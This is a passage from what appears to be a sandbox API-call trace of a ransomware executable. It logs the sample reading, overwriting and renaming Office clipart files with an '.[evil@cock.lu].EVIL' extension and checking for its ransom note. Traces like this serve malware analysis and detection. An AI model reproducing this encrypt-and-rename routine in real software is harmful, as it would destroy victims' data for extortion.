Office\\root\\CLIPART\\PUB60COR\\HH01329_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01329_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01329_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01329_.wmf.[evil@cock.lu].evil")) returned 1 [0126.941] ??_V@YAXPEAX@Z () returned 0x1 [0126.944] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01329_.WMF", dwFileAttributes=0x200) returned 0 [0126.944] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0126.944] wcsstr (_Str="HH01461_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0126.944] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01461_.WMF") returned 69 [0126.944] wcscmp (_String1="HH01461_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0126.944] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="HH01461_.WMF") returned 0x0 [0126.944] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01461_.WMF") returned 0x45 [0126.945] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01461_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01461_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0126.947] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1746, lpOverlapped=0x0) returned 1 [0126.953] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0126.953] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0126.953] _errno () returned 0x84b1160840 [0126.953] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.953] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x1760, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1760, lpOverlapped=0x0) returned 1 [0126.953] CloseHandle (hObject=0x1a8) returned 1 [0126.953] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01461_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0126.953] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0126.953] __uncaught_exception () returned 0x84b1160800 [0126.953] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0126.954] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01461_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01461_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01461_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01461_.wmf.[evil@cock.lu].evil")) returned 1 [0126.955] ??_V@YAXPEAX@Z () returned 0x1 [0126.958] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01461_.WMF", dwFileAttributes=0x200) returned 0 [0126.958] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0126.958] wcsstr (_Str="HH01618_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0126.958] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01618_.WMF") returned 69 [0126.958] wcscmp (_String1="HH01618_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0126.958] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="HH01618_.WMF") returned 0x0 [0126.958] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01618_.WMF") returned 0x45 [0126.959] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01618_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01618_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0126.961] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1c80, lpOverlapped=0x0) returned 1 [0126.965] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0126.965] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0126.965] _errno () returned 0x84b1160840 [0126.965] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.965] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x1ca0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1ca0, lpOverlapped=0x0) returned 1 [0126.965] CloseHandle (hObject=0x1a8) returned 1 [0126.965] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01618_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0126.965] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0126.966] __uncaught_exception () returned 0x84b1160800 [0126.966] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0126.966] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01618_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01618_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01618_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01618_.wmf.[evil@cock.lu].evil")) returned 1 [0126.967] ??_V@YAXPEAX@Z () returned 0x1 [0126.970] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01618_.WMF", dwFileAttributes=0x200) returned 0 [0126.970] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0126.970] wcsstr (_Str="HH01759_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0126.970] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01759_.WMF") returned 69 [0126.970] wcscmp (_String1="HH01759_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0126.971] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="HH01759_.WMF") returned 0x0 [0126.971] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01759_.WMF") returned 0x45 [0126.971] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01759_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01759_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0126.973] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1526, lpOverlapped=0x0) returned 1 [0126.979] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0126.979] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0126.979] _errno () returned 0x84b1160840 [0126.979] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.979] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x1540, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1540, lpOverlapped=0x0) returned 1 [0126.979] CloseHandle (hObject=0x1a8) returned 1 [0126.979] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01759_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0126.980] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0126.980] __uncaught_exception () returned 0x84b1160800 [0126.980] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0126.980] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01759_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01759_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01759_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01759_.wmf.[evil@cock.lu].evil")) returned 1 [0126.981] ??_V@YAXPEAX@Z () returned 0x1 [0126.984] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01759_.WMF", dwFileAttributes=0x200) returned 0 [0126.985] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0126.985] wcsstr (_Str="HH01875_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0126.985] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01875_.WMF") returned 69 [0126.985] wcscmp (_String1="HH01875_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0126.985] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="HH01875_.WMF") returned 0x0 [0126.985] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01875_.WMF") returned 0x45 [0126.985] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01875_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01875_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0126.995] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xa38, lpOverlapped=0x0) returned 1 [0126.998] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0126.998] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0126.998] _errno () returned 0x84b1160840 [0126.998] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.998] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0xa40, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xa40, lpOverlapped=0x0) returned 1 [0126.999] CloseHandle (hObject=0x1a8) returned 1 [0126.999] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01875_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0126.999] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0127.000] __uncaught_exception () returned 0x84b1160800 [0127.000] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0127.000] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01875_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01875_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01875_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01875_.wmf.[evil@cock.lu].evil")) returned 1 [0127.001] ??_V@YAXPEAX@Z () returned 0x1 [0127.004] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01875_.WMF", dwFileAttributes=0x200) returned 0 [0127.004] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0127.004] wcsstr (_Str="HH01923_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0127.004] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01923_.WMF") returned 69 [0127.004] wcscmp (_String1="HH01923_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0127.004] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="HH01923_.WMF") returned 0x0 [0127.004] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01923_.WMF") returned 0x45 [0127.005] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01923_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01923_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0127.008] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x6852, lpOverlapped=0x0) returned 1 [0127.017] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.017] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.017] _errno () returned 0x84b1160840 [0127.017] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.017] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x6860, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x6860, lpOverlapped=0x0) returned 1 [0127.017] CloseHandle (hObject=0x1a8) returned 1 [0127.018] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01923_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0127.019] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0127.019] __uncaught_exception () returned 0x84b1160800 [0127.019] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0127.019] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01923_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01923_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01923_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01923_.wmf.[evil@cock.lu].evil")) returned 1 [0127.020] ??_V@YAXPEAX@Z () returned 0x1 [0127.023] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01923_.WMF", dwFileAttributes=0x200) returned 0 [0127.023] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0127.023] wcsstr (_Str="HH02155_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0127.023] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02155_.WMF") returned 69 [0127.024] wcscmp (_String1="HH02155_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0127.024] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="HH02155_.WMF") returned 0x0 [0127.024] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02155_.WMF") returned 0x45 [0127.024] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02155_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh02155_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0127.026] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xa90, lpOverlapped=0x0) returned 1 [0127.029] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.029] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.029] _errno () returned 0x84b1160840 [0127.029] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.029] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0xaa0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xaa0, lpOverlapped=0x0) returned 1 [0127.029] CloseHandle (hObject=0x1a8) returned 1 [0127.030] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02155_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0127.030] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0127.030] __uncaught_exception () returned 0x84b1160800 [0127.030] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0127.030] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02155_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh02155_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02155_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh02155_.wmf.[evil@cock.lu].evil")) returned 1 [0127.031] ??_V@YAXPEAX@Z () returned 0x1 [0127.034] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02155_.WMF", dwFileAttributes=0x200) returned 0 [0127.035] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0127.035] wcsstr (_Str="HH02166_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0127.035] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02166_.WMF") returned 69 [0127.035] wcscmp (_String1="HH02166_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0127.035] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="HH02166_.WMF") returned 0x0 [0127.035] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02166_.WMF") returned 0x45 [0127.035] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02166_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh02166_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0127.038] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x52c, lpOverlapped=0x0) returned 1 [0127.040] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.040] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.041] _errno () returned 0x84b1160840 [0127.041] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.041] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x540, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x540, lpOverlapped=0x0) returned 1 [0127.041] CloseHandle (hObject=0x1a8) returned 1 [0127.041] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02166_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0127.041] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0127.041] __uncaught_exception () returned 0x84b1160800 [0127.041] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0127.042] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02166_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh02166_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02166_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh02166_.wmf.[evil@cock.lu].evil")) returned 1 [0127.042] ??_V@YAXPEAX@Z () returned 0x1 [0127.046] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02166_.WMF", dwFileAttributes=0x200) returned 0 [0127.046] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0127.046] wcsstr (_Str="HH02282_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0127.046] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02282_.WMF") returned 69 [0127.046] wcscmp (_String1="HH02282_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0127.046] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="HH02282_.WMF") returned 0x0 [0127.047] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02282_.WMF") returned 0x45 [0127.047] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02282_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh02282_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0127.052] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1efc, lpOverlapped=0x0) returned 1 [0127.058] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.058] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.059] _errno () returned 0x84b1160840 [0127.059] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.059] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x1f00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1f00, lpOverlapped=0x0) returned 1 [0127.059] CloseHandle (hObject=0x1a8) returned 1 [0127.059] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02282_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0127.059] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0127.059] __uncaught_exception () returned 0x84b1160800 [0127.059] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0127.060] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02282_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh02282_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02282_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh02282_.wmf.[evil@cock.lu].evil")) returned 1 [0127.061] ??_V@YAXPEAX@Z () returned 0x1 